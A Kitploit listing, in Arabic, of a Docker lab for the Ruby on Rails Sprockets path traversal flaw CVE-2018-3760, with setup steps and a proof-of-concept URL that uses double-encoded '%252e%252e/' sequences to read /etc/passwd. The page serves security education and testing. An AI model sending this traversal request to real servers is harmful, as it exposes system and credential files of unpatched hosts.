Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760- — مختبر قائم على Docker يوضح ثغرة اجتياز المسار CVE-2018-3760 في Sprockets الخاصة بـ Ruby on Rails، مع PoC وإعداد البيئة للاختبار الأمني والتعليم. | Kitploit
أدوات/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

مختبر قائم على Docker يوضح ثغرة اجتياز المسار CVE-2018-3760 في Sprockets الخاصة بـ Ruby on Rails، مع PoC وإعداد البيئة للاختبار الأمني والتعليم.

عرض المستودع
31منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة اجتياز المسار في Ruby On Rails(CVE-2018-3760)

النسخة الصينية

Ruby On Rails هو إطار عمل ويب معروف لتطوير تطبيقات الويب بلغة Ruby، ويستخدم Sprockets كخادم ملفات ثابتة في بيئة التطوير. Sprockets هي مكتبة Ruby تقوم بتجميع وتوزيع ملفات الموارد الثابتة.

توجد ثغرة اجتياز مسار ناتجة عن فك الترميز الثانوي في Sprockets 3.7.1 والإصدارات الأقدم. يمكن للمهاجم استخدام %252e%252e/ للوصول إلى الدليل الجذر وقراءة أو تنفيذ أي ملف على الخادم المستهدف.

الروابط المرجعية:

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

إعداد البيئة

أدخل الأمر التالي:

root@kitploit:~
docker-compose up -d

قم بزيارة http://your-ip:3000 وسترى صفحة الترحيب.

POC

سيتم عرض خطأ عند زيارة http://your-ip:3000/assets/file:%2f%2f/etc/passwd مباشرة، لأن الملف /etc/passwd ليس ضمن الدلائل المسموح بها.

يمكننا الحصول على قائمة بالدلائل المسموح بها من صفحة الخطأ. فقط اختر أحدها، مثل /usr/src/blog/app/assets/images، ثم استخدم %252e%252e/ للانتقال إلى الدليل الأصلي، واقرأ أخيرًا الملف /etc/passwd:

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

تنزيل الأداة